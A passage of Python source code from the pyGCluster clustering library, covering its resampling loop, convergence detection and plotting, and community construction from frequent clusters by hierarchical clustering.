min_count = int( min_cluster_freq_2_retain * kwargs4multiprocess[ 'iterations' ] * 0.5 )
if min_count < 2:
s = '[ WARNING ] params "min_cluster_freq_2_retain" = {0} and "iter_step" = {1}, hence min_count = {2}\n\t-> huge accumulation of unstable clusters in pyGCluster!'
self._print( s.format( min_cluster_freq_2_retain, kwargs4multiprocess[ 'iterations' ], min_count ), verbosity_level = 1 )
# check if multiprocess are valid:
self._print( 'checking if multiprocesses are functioning ...', end = ' ', verbosity_level = 2 )
try:
tmp_kwargs4multiprocess = { k : v for k, v in kwargs4multiprocess.items() }
tmp_kwargs4multiprocess[ 'iterations' ] = 1
p = multiprocessing.Process( target = resampling_multiprocess, kwargs = tmp_kwargs4multiprocess )
p.start()
del tmp_kwargs4multiprocess
except:
self._print( '[ ERROR ] Failed to launch multi-processes!', file = sys.stderr, verbosity_level = 0 )
seekAndDestry( [ p ] )
raise
try:
DataQ.get()
p.join()
except:
self._print( '[ ERROR ] Failed to collect multi-processes!', file = sys.stderr, verbosity_level = 0 )
seekAndDestry( [ p ] )
raise
self._print( 'success!', verbosity_level = 2 )
## other stuff:
self[ 'Convergence determination - iteration 2 n_mostfreq' ] = {}
iteration = 0
converged = False
ask2continue = False
iter_to_continue = False
### now comes the actual re-sampling routine :)
while not converged:
# prevent exceeding iter_max:
if iter_max < iteration + n_multiprocesses * iter_step and not iter_to_continue:
n_multiprocesses_tmp = int( math.ceil( float( iter_max - iteration ) / iter_step ) )
s = 'Continuing another {0} (# processes) * {1} (iter_step) iterations would exceed iter_max (= {2}). Hence, # processes are lowered to {3} so that {4} iterations have been totally performed.'
self._print( s.format( n_multiprocesses, iter_step, iter_max, n_multiprocesses_tmp, iteration + n_multiprocesses_tmp * iter_step ), verbosity_level = 2 )
n_multiprocesses = n_multiprocesses_tmp
# Launching multi-processes
processes = []
for i in range( n_multiprocesses ):
p = multiprocessing.Process( target = resampling_multiprocess, kwargs = kwargs4multiprocess )
p.start()
processes.append( p )
time.sleep( random.random() ) # to increase randomness!
# Collecting Process outputs and transfer cluster-counts into 'tmpstruct_clustercounts'
for i in range( n_multiprocesses ):
cluster_counts_list = DataQ.get()
iteration += kwargs4multiprocess[ 'iterations' ]
self._print( "Clustering. Resampling data : iteration {0: >7}/{1}".format( iteration, iter_max ), end = '\r', file = sys.stderr, verbosity_level = 1 )
for cluster, counts in cluster_counts_list:
# get cluster ID:
if cluster in tmpstruct_clustercounts[ 'Cluster 2 clusterID' ]:
clusterID = tmpstruct_clustercounts[ 'Cluster 2 clusterID' ][ cluster ]
else:
# if available, get a discarded ID and assign this ID to the cluster:
if tmpstruct_clustercounts[ 'Discarded IDs' ]:
try:
clusterID = tmpstruct_clustercounts[ 'Discarded IDs' ].pop()
except KeyError: # KeyError: 'pop from an empty set' = set is empty
clusterID = len( tmpstruct_clustercounts[ 'Cluster 2 clusterID' ] )
else:
clusterID = len( tmpstruct_clustercounts[ 'Cluster 2 clusterID' ] )
tmpstruct_clustercounts[ 'Cluster 2 clusterID' ][ cluster ] = clusterID
# update counts:
try:
tmpstruct_clustercounts[ 'Cluster counts' ][ clusterID ] += counts
except IndexError:
tmpstruct_clustercounts[ 'Cluster counts' ] = numpy.concatenate(
( tmpstruct_clustercounts[ 'Cluster counts' ],
numpy.zeros( ( 10 ** 5, n_dlc ), dtype = numpy.uint32 )
)
)
tmpstruct_clustercounts[ 'Cluster counts' ][ clusterID ] += counts
# determine most frequent clusters:
min_count = iteration * iter_top_P
mostfreqIDs = numpy.unique( numpy.nonzero( tmpstruct_clustercounts[ 'Cluster counts' ] >= min_count )[ 0 ] )
self[ 'Convergence determination - iteration 2 n_mostfreq' ][ iteration ] = len( mostfreqIDs )
del mostfreqIDs
# check if converged:
if iter_till_the_end == False:
converged = self.check4convergence()
if converged or force_plotting:
self.convergence_plot()
del cluster_counts_list
# terminate processes:
for p in processes:
p.join()
# once all processes finished iter_step clusterings, perform a purging step:
# discard all clusters with a maximum count of the threshold:
min_required_count = int( min_cluster_freq_2_retain * 0.5 * ( kwargs4multiprocess[ 'iterations' ] * n_multiprocesses ) )
self._print('\nDiscarding {0}-count-clusters ...'.format( min_required_count ), end = ' ', file = sys.stderr, verbosity_level = 2)
max_counts = numpy.amax( tmpstruct_clustercounts[ 'Cluster counts' ], axis = 1 ) # get max count for each cluster
IDs2discard = set( numpy.nonzero( max_counts == 1 )[ 0 ] )
del max_counts
# reset counts:
for ID in IDs2discard:
tmpstruct_clustercounts[ 'Cluster counts' ][ ID ][ : ] = 0
# delete those clusters which were attributed the discarded clusterIDs
clusters2discard = [ c for c, cID in tmpstruct_clustercounts[ 'Cluster 2 clusterID' ].items() if cID in IDs2discard ]
for cluster in clusters2discard:
del tmpstruct_clustercounts[ 'Cluster 2 clusterID' ][ cluster ]
del cluster
del clusters2discard
self._print( '{0} discarded.'.format( len( IDs2discard ) ), file = sys.stderr, verbosity_level = 2 )
tmpstruct_clustercounts[ 'Discarded IDs' ] = IDs2discard
del IDs2discard
if converged and iteration < iter_max and not iter_till_the_end:
ask2continue = True
elif iteration >= iter_max:
self._print( '\niter_max reached. See convergence plot. Stopping re-sampling if not defined otherwise ...', verbosity_level = 1 )
converged = True
self.convergence_plot()
ask2continue = True
# ask if user wants to continue with the re-sampling process:
if ask2continue and self[ 'Verbosity level' ] > 0:
self._print( '\nEnter how many iterations you would like to continue. (Has to be a multiple of iterstep = {0})'.format( iter_step ), verbosity_level = 1 )
self._print( '(enter "0" to stop resampling.)', verbosity_level = 1 )
self._print( '(enter "-1" to resample until iter_max (= {0}) is reached.)'.format( iter_max ), verbosity_level = 1 )
while True:
answer = input( 'Enter a number ...' )
try:
iter_to_continue = int( answer )
break
except:
self._print( 'INT conversion failed. Please try again!', verbosity_level = 1 )
converged = False
if iter_to_continue == 0:
converged = True
elif iter_to_continue == -1:
iter_till_the_end = True
ask2continue = False
if iteration == iter_max:
converged = True
else:
iter_to_continue = int( iter_step * round(iter_to_continue / float(iter_step)) )
if iter_to_continue < iter_step:
iter_to_continue = iter_step
iter_to_continue = int( math.ceil( float( iter_to_continue ) / n_multiprocesses ) )
self._print( 'Resampling will continue another {0} iterations.'.format( iter_to_continue * n_multiprocesses ), verbosity_level = 1 )
kwargs4multiprocess[ 'iterations' ] = iter_to_continue
# final filtering: store only clusters in pyGCluster whose max_frequencies are above min_cluster_freq_2_retain (default 0.001):
min_count = iteration * min_cluster_freq_2_retain
clusterIDs2retain = set( numpy.nonzero( tmpstruct_clustercounts[ 'Cluster counts' ] >= min_count )[0] )
self._print( '{0} clusters above threshold of {1}. '.format( len( clusterIDs2retain ), min_cluster_freq_2_retain ), verbosity_level = 2 )
self[ 'Cluster counts' ] = numpy.zeros( ( len( clusterIDs2retain ), n_dlc ), dtype = numpy.uint32 )
baseX = len( alphabet )
tmp = {}
tmp[ 'Iterations' ] = iteration
tmp[ 'Cluster 2 clusterID' ] = {}
tmp[ 'Cluster counts' ] = tmpstruct_clustercounts[ 'Cluster counts' ]
tmp[ 'Distance-linkage combinations' ] = self[ 'Distance-linkage combinations' ]
tmp[ 'Data' ] = self[ 'Data' ]
for cluster, clusterID in tmpstruct_clustercounts[ 'Cluster 2 clusterID' ].items():
if clusterID in clusterIDs2retain:
final_cluster = []
# map cluster back to decimal indices:
for baseXstring in cluster.split( ',' ):
index = 0
for i, digit in enumerate( baseXstring[ ::-1 ] ):
index += alphabet.find( digit ) * baseX ** i
final_cluster.append( index )
final_cluster.sort()
final_cluster = tuple( final_cluster )
tmp[ 'Cluster 2 clusterID' ][ final_cluster ] = clusterID
self.__add__( tmp )
# pickle results:
if pickle_filename:
self.save( pickle_filename )
s = 're-sampling routine for {0} iterations finished. {1} clusters were obtained.'
self._print( s.format( iteration, len(clusterIDs2retain) ), verbosity_level = 1 )
return
def _get_normalized_slope(self, y2, y1, iter_step):
'''
Calculates the normalized slope between two 2D-coordinates:
i.e. ( y2 / y1 ) - (1.0) / iter_step,
where y = amount of most frequent clusters at a certain iteration,
and iter_step = x2 - x1.
:param y2: the y-coordinate of the second point.
:type y2: float
:param y1: the y-coordinate of the first point.
:type y1: float
:param iter_step: the difference between the x-coordinates of the two points, i.e. x2 - x1.
:type iter_step: float
rtype: float
'''
numerator = float( y2 ) / float( y1 ) - 1.0
norm_slope = numerator / float( iter_step )
return norm_slope
def check4convergence(self):
'''
Checks if the re-sampling routine may be terminated, because the number of most frequent clusters remains almost constant.
This is done by examining a plot of the amount of most frequent clusters vs. the number of iterations.
Convergence is declared once the median normalized slope in a given window of iterations is equal or below "iter_tol".
For further information see Supplementary Material of the corresponding publication.
:rtype: boolean
'''
converged = False
sorted_iter2nfreqs = sorted( self[ 'Convergence determination - iteration 2 n_mostfreq' ].items() )
iter_step = self[ 'Convergence determination - params' ][ 'iter_step' ]
iter_window = self[ 'Convergence determination - params' ][ 'iter_window' ]
iter_tol = self[ 'Convergence determination - params' ][ 'iter_tol' ]
# determine normalized slope:
norm_slopes = []
for i, ( iteration, n_mostfreq ) in enumerate( sorted_iter2nfreqs ):
if i == 0:
continue
n_mostfreq_before = sorted_iter2nfreqs[ i - 1 ][ 1 ]
norm_slope = self._get_normalized_slope( y2 = n_mostfreq, y1 = n_mostfreq_before, iter_step = iter_step )
norm_slopes.append( norm_slope )
# determine convergence - is the median of normalized slopes in iter_window iterations <= iter_tol?
n_slopes = int( round( float( iter_window ) / iter_step ) ) # prepare for sliding window
for i in range( len( norm_slopes ) - n_slopes + 1 ):
iteration = iter_step + iter_step * n_slopes + i * iter_step
slopes_in_sliding_window = norm_slopes[ i : i + n_slopes ]
median_slope = self.median( slopes_in_sliding_window )
if -iter_tol <= median_slope <= iter_tol:
converged = True
self._print( '\npotentially converged. Check convergence plot!', file = sys.stderr, verbosity_level = 2 )
self[ 'Convergence determination - first detected at iteration' ] = iteration
break
return converged
def convergence_plot(self, filename = 'convergence_plot.pdf'):
'''
Creates a two-sided PDF file containing the full picture of the convergence plot, as well as a zoom of it.
The convergence plot illustrates the development of the amount of most frequent clusters vs. the number of iterations.
The dotted line in this plots represents the normalized slope, which is used for internal convergence determination.
If rpy2 cannot be imported, a CSV file is created instead.
:param filename: the filename of the PDF (or CSV) file.
:type filename: string
:rtype: none
'''
try:
from rpy2.robjects import IntVector, FloatVector, StrVector
from rpy2.robjects.packages import importr
graphics = importr( 'graphics' )
grdevices = importr( 'grDevices' )
except ImportError:
filename = filename.replace( '.pdf', '.csv' )
with open( os.path.join( self[ 'Working directory' ], filename ), 'w' ) as fout:
print( 'iteration,amount of most frequent clusters', file = fout )
for iteration, n_mostfreq in self[ 'Convergence determination - iteration 2 n_mostfreq' ].items():
print( '{0},{1}'.format( iteration, n_mostfreq ), file = fout )
self._print( '[ INFO ] Since rpy2 could not be imported, a CSV file instead of a PDF plot of convergence was created. See in "{0}".'.format( os.path.join( self[ 'Working directory' ], filename ) ), file = sys.stderr, verbosity_level = 1 )
return
def _add_lines( points2connect, lty = 1, color = 'black' ):
for i, ( x, y ) in enumerate( points2connect ):
if i == 0:
continue
x_before, y_before = points2connect[ i - 1 ]
graphics.lines( IntVector( [ x_before, x ] ),
FloatVector( [ y_before, y ] ),
lty = lty,
col = color
)
iter_step = self[ 'Convergence determination - params' ][ 'iter_step' ]
iter_window = self[ 'Convergence determination - params' ][ 'iter_window' ]
iter_tol = self[ 'Convergence determination - params' ][ 'iter_tol' ]
iteration2mostfreq = self[ 'Convergence determination - iteration 2 n_mostfreq' ]
sorted_iter2mostfreq = sorted( iteration2mostfreq.items() )
# plot convergence curve:
grdevices.pdf( file = os.path.join( self[ 'Working directory' ], filename ), width = 12, height = 12 )
for tag in [ 'full', 'zoom' ]:
points = sorted_iter2mostfreq
Ys = [ y for x, y in points ]
if tag == 'full':
ylim = ( min( Ys ), max( Ys ) )
title = '#most_freq (left y-axis) and normalized_slope (= (current / before - 1.0) / iter_step) (right y-axis)'
elif tag == 'zoom':
ylim = ( min( Ys ), min( Ys ) * 1.075 )
title = 'ZOOM'
subtitle = 'iter_top_P = {0}, iter_step = {1}, iter_tol = {2}, iter_window = {4}, iter_max = {3}'
subtitle = subtitle.format(
self[ 'Convergence determination - params' ][ 'iter_top_P' ],
iter_step,
iter_tol,
self[ 'Convergence determination - params' ][ 'iter_max' ],
iter_window
)
graphics.plot(
IntVector( [ x for x, y in points ] ),
IntVector( Ys ),
main = title,
sub = subtitle,
xlab = 'iteration', xaxt = 'n',
ylab = 'len(most_freq)', ylim = IntVector( ylim ),
col = 'black',
pch = 16
)
_add_lines( points, lty = 1, color = 'black' )
x_axis_ticks = tuple( range( iter_step, max( iteration2mostfreq.keys() ) + 1, iter_step ) )
graphics.axis(1, at = IntVector( x_axis_ticks ), labels = [ '{0}k'.format( tick / 1000 ) for tick in x_axis_ticks ], las = 2, **{ 'cex.axis' : 0.75 } )
graphics.axis(3, at = IntVector( x_axis_ticks ), labels = StrVector( [ '' for tick in x_axis_ticks ] ) )
graphics.legend(
'bottomleft',
legend = StrVector( [ '#most_freq', 'normalized_slope' ] ),
lty = IntVector( [1, 2] ),
pch = IntVector( [16, 1] ),
bty = 'n'
)
# add second plot = normalized_slope-plot:
graphics.par( new = True )
critical_interval = ( -iter_tol, iter_tol )
try:
firstConvergedAtIter = self[ 'Convergence determination - first detected at iteration' ]
except KeyError:
self.check4convergence()
firstConvergedAtIter = self[ 'Convergence determination - first detected at iteration' ]
iter2normslope = [ ( iter_step, -1.0 ) ]
for i, (iteration, n_mostfreq) in enumerate( sorted_iter2mostfreq[ 1: ] ):
iteration_before, n_mostfreq_before = sorted_iter2mostfreq[ i ] # iteration2mostfreq[ iteration - iter_step ]
norm_slope = self._get_normalized_slope( y2 = n_mostfreq, y1 = n_mostfreq_before, iter_step = iteration - iteration_before )
iter2normslope.append( ( iteration, norm_slope ) )
points = iter2normslope
Ys = [ y for x, y in points ]
ylim = ( critical_interval[ 0 ] * 20, critical_interval[ 1 ] * 20)
graphics.plot(
IntVector( [ x for x, y in points ] ),
FloatVector( Ys ),
main = '',
xlab = '',
xaxt = 'n',
ylab = '',
yaxt = 'n',
ylim = FloatVector( ylim ),
pch = 1
)
_add_lines( points, lty = 2, color = 'black' )
graphics.abline( v = firstConvergedAtIter, lty = 1, col = 'blue' )
graphics.lines( IntVector( [ firstConvergedAtIter - iter_window, firstConvergedAtIter ] ), FloatVector( [ 0, 0 ] ), col = 'darkgreen' )
graphics.text( firstConvergedAtIter, 0, str( firstConvergedAtIter / 1000 ), col = 'blue' )
graphics.abline( h = critical_interval[ 0 ], lty = 3, col = 'darkgreen' )
graphics.abline( h = critical_interval[ 1 ], lty = 3, col = 'darkgreen' )
graphics.axis(4, FloatVector( [ ylim[ 0 ], ylim[ 0 ] / 20. * 10, 0, ylim[ 1 ] / 20. * 10, ylim[ 1 ] ] ) )
grdevices.dev_off()
self._print( '... plot of convergence finished. See plot in "{0}".'.format( os.path.join( self[ 'Working directory' ], filename ) ), file = sys.stderr, verbosity_level = 2 )
return
def plot_clusterfreqs(self, min_cluster_size = 4, top_X_clusters = None, threshold_4_the_lowest_max_freq = 0.01):
'''
Plot the frequencies of each cluster as a expression map:
which cluster was found by which distance-linkage combination, and with what frequency?
The plot's filename is prefixed by 'clusterFreqsMap', followed by the values of the parameters.
E.g. 'clusterFreqsMap_minSize4_top0clusters_top10promille.svg'.
Clusters are sorted by size.
:param min_cluster_size: only clusters with a size equal or greater than min_cluster_size appear in the plot of the cluster freqs.
:type min_cluster_size: int
:param threshold_4_the_lowest_max_freq: ]0, 1[ Clusters must have a maximum frequency of at least threshold_4_the_lowest_max_freq to appear in the plot.
:type threshold_4_the_lowest_max_freq: float
:param top_X_clusters: Plot of the top X clusters in the sorted list (by freq) of clusters having a maximum cluster frequency of at least threshold_4_the_lowest_max_freq (clusterfreq-plot is still sorted by size).
:type top_X_clusters: int
:rtype: None
'''
self[ 'Function parameters' ][ self.plot_clusterfreqs.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
allClusters_sortedByLength_l = sorted( self._get_most_frequent_clusters(min_cluster_size = min_cluster_size, top_X_clusters = top_X_clusters, threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq), key = len, reverse = True )
identifiers = []
data = {}
freqs = set()
for cluster in allClusters_sortedByLength_l:
identifier = 'Cluster ID: {0}, size: {1}'.format( self[ 'Cluster 2 clusterID' ][ cluster ], len( cluster ) )
identifiers.append( identifier )
data[ identifier ] = {}
cFreq, cFreqDict = self.frequencies( cluster = cluster )
for dlc, frequency in sorted( cFreqDict.items() ):
data[ identifier ][ dlc ] = ( frequency, sys.float_info.epsilon )
freqs.add( round( frequency, 2) )
hm_filename = 'clusterFreqsMap_minSize{0}_top{1}clusters_top{2:.0f}promille'.format( min_cluster_size, top_X_clusters, threshold_4_the_lowest_max_freq * 1000 )
# max_value_4_expression_map = sorted( freqs )[ -3 ] # since root cluster has a freq of 1.0, position -1 is always 1.0 (and -2 close to 1.0 (root, too)!)
self.draw_expression_map(
identifiers = identifiers,
data = data,
conditions = sorted( cFreqDict.keys() ),
additional_labels = {},
# min_value_4_expression_map = 0.0,
max_value_4_expression_map = max( freqs ),
expression_map_filename = hm_filename+'.svg',
legend_filename = hm_filename+'_legend.svg',
color_gradient = 'barplot'
)
self._print( '... clusterfreqs_expressionmap saved as: "{0}"'.format( hm_filename+'.svg' ), verbosity_level = 1 )
return
def _get_most_frequent_clusters(self, min_cluster_size = 4, top_X_clusters = None, threshold_4_the_lowest_max_freq = 0.01):
'''
Gets the most frequent clusters. Filters either according to a frequency-threshold or gets the top X clusters.
.. note ::
Each cluster has attributed X counts, or frequencies, where X = len( Distance-linkage combinations ).
For determination of most frequent clusters, only the max( X frequencies ) matters.
Hence, a single frequency above threshold_4_the_lowest_max_freq is sufficient to include that cluster.
:param min_cluster_size: only clusters bigger or equal than threshold are considered; e.g. 4
:type min_cluster_size: int
:param threshold_4_the_lowest_max_freq: ]0, 1[ get all clusters with a max frequency above threshold, e.g. 0.01 => 1%-clusters
:type threshold_4_the_lowest_max_freq: float
:param top_X_clusters: get the top X clusters in the sorted list (by freq) of clusters having a maximum cluster frequency of at least threshold_4_the_lowest_max_freq.
:type top_X_clusters: int
:rtype: List of the most frequent clusters in ARBITRARY order.
'''
import numpy
threshold_4_the_lowest_max_freq = float( threshold_4_the_lowest_max_freq )
topP_count = self[ 'Iterations' ] * threshold_4_the_lowest_max_freq
most_freq = []
max_counts = numpy.amax( self[ 'Cluster counts' ], axis = 1 ) # get max count for each cluster
if top_X_clusters is None:
mostfreqIDs = set( numpy.nonzero( max_counts >= topP_count )[ 0 ] )
for cluster, clusterID in self[ 'Cluster 2 clusterID' ].items():
if len( cluster ) >= min_cluster_size:
if clusterID in mostfreqIDs:
most_freq.append( cluster )
else: # top_X_clusters filter is requested:
cID_mask = [ cID for c, cID in self[ 'Cluster 2 clusterID' ].items() if len( c ) < min_cluster_size ]
clusterIDs2retain = []
for cID, _ in enumerate( max_counts >= topP_count ):
if _:
if cID in cID_mask:
continue
clusterIDs2retain.append( ( max_counts[ cID ], cID ) )
clusterIDs2retain.sort( reverse = True )
topX_clusterIDs = set( [ cID for count, cID in clusterIDs2retain[ : int(top_X_clusters) ] ] )
for cluster, clusterID in self[ 'Cluster 2 clusterID' ].items():
if clusterID in topX_clusterIDs:
most_freq.append(cluster)
s = '{0} clusters are found for a threshold for {1} and a min cluster len of {2}.'
self._print( s.format( len( most_freq ), threshold_4_the_lowest_max_freq, min_cluster_size ), verbosity_level = 1 )
return most_freq
def plot_nodetree(self, tree_filename = 'tree.dot'):
'''
plot the dendrogram for the clustering of the most_frequent_clusters.
- node label = nodeID internally used for self['Nodemap'] (not the same as clusterID!).
- node border color is white if the node is a close2root-cluster (i.e. larger than self[ 'for IO skip clusters bigger than' ] ).
- edge label = distance between parent and children.
- edge - color codes:
- black = default; highlights child which is not a most_frequent_cluster but was created during formation of the dendrogram.
- green = children are connected with the root.
- red = highlights child which is a most_frequent_cluster.
- yellow = most_frequent_cluster is directly connected with the root.
:param tree_filename: name of the Graphviz DOT file containing the dendrogram of the AHC of most frequent clusters. Best given with ".dot"-extension!
:type tree_filename: string
:rtype: none
'''
with open( os.path.join( self[ 'Working directory' ], tree_filename ), 'w' ) as fout:
print( 'digraph "pyGCluster nodemap_of_the_clustering_of_most_freq_clusters" {', file = fout )
node2tag = {}
# draw nodes:
for tag, node in enumerate( self[ 'Nodemap - binary tree' ] ):
color = 'black'
try:
label = str( self[ 'Cluster 2 clusterID' ][ tuple( sorted( set( node ) ) ) ] )
except KeyError:
label = '-1'
label = 'size={0}, id={1}'.format( len( set( node ) ), label )
if self[ 'Root size' ] > len( set( node ) ) > self[ 'for IO skip clusters bigger than' ]:
color = 'white'
print( '"{0}" [label="{1}", color = "{2}"];'.format( tag, label, color ), file = fout )
node2tag[ node ] = tag
# insert connecting arrows:
for tag, parent in enumerate( self[ 'Nodemap - binary tree' ] ):
is_root_node = False
if len( set( parent ) ) == self[ 'Root size' ]:
is_root_node = True
for child in self[ 'Nodemap - binary tree' ][ parent ][ 'children' ]:
color = 'black'
if len( self[ 'Nodemap - binary tree' ][ child ][ 'children' ] ) == 0:
color = 'red'
if is_root_node:
if color == 'red':
color = 'yellow'
else:
color = 'green'
print( '"{0}" -> "{1}" [color="{2}"];'.format( tag, node2tag[ child ], color ), file = fout )
print( '}', file = fout )
# plot tree:
try:
input_file = '{0}'.format( os.path.join( self[ 'Working directory' ], tree_filename ) )
output_file = '{0}'.format( os.path.join( self[ 'Working directory' ], '{0}.pdf'.format( tree_filename[ :-4 ] ) ) )
subprocess.Popen( [ 'dot', '-Tpdf', input_file, '-o', output_file ] ).communicate()
except:
self._print( '[ INFO ] plotting via "dot -Tpdf ..." of the binary cluster-tree failed; only DOT file created.', verbosity_level = 1 )
return
def calculate_distance_matrix(self, clusters, min_overlap = 0.25):
'''
Calculates the specifically developed distance matrix for the AHC of clusters:
(1) Clusters sharing *not* the minimum overlap are attributed a distance of "self[ 'Root size' ]" (i.e. len( self[ 'Data' ] ) ).
(2) Clusters are attributed a distance of "self[ 'Root size' ] - 1" to the root cluster.
(3) Clusters sharing the minimum overlap are attributed a distance of "size of the larger of the two clusters minus size of the overlap".
The overlap betweeen a pair of clusters is relative, i.e. defined as the size of the overlap divided by the size of the larger of the two clusters.
The resulting condensed distance matrix in not returned, but rather stored in self[ 'Nodemap - condensed distance matrix' ].
:param clusters: the most frequent clusters whose "distance" is to be determined.
:type clusters: list of clusters. Clusters are represented as tuples consisting of their object's indices.
:param min_overlap: ]0, 1[ threshold value to determine if the distance between two clusters is calculated according to (1) or (3).
:type min_overlap: float
:rtype: none
'''
self._print( 'calculating distance matrix for {0} clusters ...'.format( len( clusters ) ) , end = ' ', verbosity_level = 2 )
condensed_dist_matrix = []
a, b = 1, 1
clusters = [ set( c ) for c in clusters ]
for clusterI, clusterJ in itertools.combinations( clusters, 2 ):
if len( clusterI ) == self[ 'Root size' ] or len( clusterJ ) == self[ 'Root size' ]:
dist = a * self[ 'Root size' ] - b
else:
overlap = clusterI & clusterJ
n_overlap = float( len( overlap ) )
n_sizeI = float( len( clusterI ) )
n_sizeJ = float( len( clusterJ ) )
if n_sizeI > n_sizeJ:
max_size = n_sizeI
min_size = n_sizeJ
else:
max_size = n_sizeJ
min_size = n_sizeI
if float( n_overlap ) / float( max_size ) < min_overlap:
dist = a * self[ 'Root size' ]
else:
dist = a * max_size - b * n_overlap
condensed_dist_matrix.append( dist )
self[ 'Nodemap - condensed distance matrix' ] = condensed_dist_matrix
self._print( 'done.', verbosity_level = 2 )
return
def _get_levelX_clusters(self, level):
'''
Returns a list of all clusters that are present on a specific level in the node map.
Each level corresponds to an iteration in the community construction.
:param level: [0, max community-iterations] sets the level (or iteration) from which the clusters are to be returned.
:type level: int
:rtype: list
'''
cluster_list = []
for name in self[ 'Communities' ]:
cluster, current_level = name
if current_level == level:
cluster_list.append( cluster )
return sorted( cluster_list )
def build_nodemap(self, min_cluster_size = 4, top_X_clusters = None, threshold_4_the_lowest_max_freq = 0.01, starting_min_overlap = 0.1, increasing_min_overlap = 0.05):
'''
Construction of communities from a set of most_frequent_cluster.
This set is obtained via :py:func:`pyGCluster.Cluster._get_most_frequent_clusters`, to which the first three parameters are passed.
These clusters are then subjected to AHC with complete linkage.
The distance matrix is calculated via :py:func:`pyGCluster.Cluster.calculate_distance_matrix`.
The combination of complete linkage and the distance matrix assures that all clusters in a community exhibit at least the "starting_min_overlap" to each other.
From the resulting cluster tree, a "first draft" of communities is obtained.
These "first" communities are then themselves considered as clusters, and subjected to AHC again, until the community assignment of clusters remains constant.
By this, clusters are inserted into a target community, which initially did not overlap with each cluster inside the target community,
but do overlap if the clusters in the target community are combined into a single cluster.
By this, the degree of stringency is reduced; the clusters fit into a community in a broader sense.
For further information on the community construction, see the publication of pyGCluster.
Internal structure of communities:
>>> name = ( cluster, level )
... # internal name of the community.
... # The first element in the tuple ("cluster") contains the indices
... # of the objects that comprise a community.
... # The second element gives the level,
... # or iteration when the community was formed.
>>> self[ 'Communities' ][ name ][ 'children' ]
... # list containing the clusters that build the community.
>>> self[ 'Communities' ][ name ][ '# of nodes merged into community' ]
... # the number of clusters that build the community.
>>> self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ]
... # an OrderedDict in which each index is assigned its obCoFreq.
... # Negative indices correspond to "placeholders",
... # which are required for the insertion of black lines into expression maps.
... # Black lines in expression maps separate the individual clusters
... # that form a community, sorted by when
... # they were inserted into the community.
>>> self[ 'Communities' ][ name ][ 'highest obCoFreq' ]
... # the highest obCoFreq encountered in a community.
>>> self[ 'Communities' ][ name ][ 'cluster ID' ]
... # the ID of the cluster containing the object with the highest obCoFreq.
Of the following parameters, the first three are passed to :py:func:`pyGCluster.Cluster._get_most_frequent_clusters`:
:param min_cluster_size: clusters smaller than this threshold are not considered for the community construction.
:type min_cluster_size: int
:param top_X_clusters: form communities from the top X clusters sorted by their maximum frequency.
:type top_X_clusters: int
:param threshold_4_the_lowest_max_freq: [0, 1[ form communities from clusters whose maximum frequency is at least this value.
:type threshold_4_the_lowest_max_freq: float
:param starting_min_overlap: ]0, 1[ minimum required relative overlap between clusters so that they are assigned the same community. The relative overlap is defined as the size of the overlap between two clusters, divided by the size of the larger cluster.
:type starting_min_overlap: float
:param increasing_min_overlap: defines the increase of the required overlap between communities
:type increasing_min_overlap: float
:rtype: none
'''
self[ 'Function parameters' ][ self.build_nodemap.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
import scipy.spatial.distance as ssd
imported_from_scipy = False
try:
from fastcluster import linkage as ahc
except ImportError:
try:
from scipy.cluster.hierarchy import linkage as ahc
imported_from_scipy = True
except ImportError:
self._print( '[ ERROR ] You do require either "fastcluster" or "scipy" for the construction of communities.', verbosity_level = 0 )
# The algorithm is as follows:
# Starting from the top, all descendants of any cluster that is smaller than the root are determined.
# Those descendants form a community.
def communities_by_ahc(cluster_list, min_overlap):
# calculate distance matrix
self.calculate_distance_matrix( clusters = cluster_list, min_overlap = min_overlap )
# perform AHC
self._print( 'performing AHC for {0} clusters ...'.format( len( cluster_list ) ), end = ' ', verbosity_level = 2 )
# avoid scipy crash when only 2 objects are subjected to AHC:
if len( self[ 'Nodemap - condensed distance matrix' ] ) == 1 and len( cluster_list ) == 2:
self[ 'Nodemap - linkage matrix' ] = [ [ 0, 1, -99, len( set( cluster_list[ 0 ] + cluster_list[ 1 ] ) ) ] ]
else:
if imported_from_scipy:
self[ 'Nodemap - linkage matrix' ] = ahc( self[ 'Nodemap - condensed distance matrix' ], method = 'complete' )
else:
self[ 'Nodemap - linkage matrix' ] = ahc( self[ 'Nodemap - condensed distance matrix' ], method = 'complete', preserve_input = True )
self._print( 'done.', verbosity_level = 2 )
# parse clusters
self._print( 'parsing clusters ...', end = ' ', verbosity_level = 2 )
clusters = {} # required to reconstruct the clusters from the linkage matrix
nodemap = {} # each node = value is a dict with two keys: 'parent' -> parent cluster (as tuple), 'children' -> set of child clusters (tuples)
for i, cluster in enumerate( cluster_list ):
clusters[ i ] = cluster
nodemap[ cluster ] = { 'children' : [], 'parent' : None }
parentID = len( cluster_list ) - 1
for childID_1, childID_2, distance, size in self[ 'Nodemap - linkage matrix' ]:
parentID += 1
child1 = clusters[ childID_1 ]
child2 = clusters[ childID_2 ]
parent = child1 + child2
clusters[ parentID ] = parent
nodemap[ child1 ][ 'parent' ] = parent
nodemap[ child2 ][ 'parent' ] = parent
nodemap[ parent ] = { 'children' : [ child1, child2 ], 'parent' : None }
self[ 'Nodemap - binary tree' ] = nodemap
self._print( 'done.', verbosity_level = 2 )
# recursive function 2 find communities:
def get_communities( node , community_list = None ):
if community_list is None:
community_list = []
for child in nodemap[ node ][ 'children' ]:
if len( set( child ) ) == self[ 'Root size' ]:
community_list = get_communities( child, community_list = community_list )
else:
community_list.append( self._get_descendants_in_binary_tree( node = child ) + [ child ] )
return community_list
# get root_node = top node of the tree:
for node in nodemap:
if nodemap[ node ][ 'parent' ] is None:
root_node = node
break
community_list = get_communities( node = root_node, community_list = None )
clusters_combined_into_communities = []
for community in community_list:
endnodes = []
for cluster in community:
if cluster in cluster_list:
endnodes.append( cluster )
clusters_combined_into_communities.append( endnodes )
return clusters_combined_into_communities
def update_communities(level, clusters_combined_into_communities):
for community in clusters_combined_into_communities:
# find cluster with highest freq
community_obCoFreq2cluster_list = []
community_indices = set()
for cluster in community:
highest_obCoFreq = self[ 'Communities' ][ ( cluster, level ) ][ 'highest obCoFreq' ]
community_obCoFreq2cluster_list.append( ( highest_obCoFreq, cluster ) )
community_indices |= set( cluster )
community_obCoFreq2cluster_list.sort( reverse = True )
# print( level , 'level', community_indices)
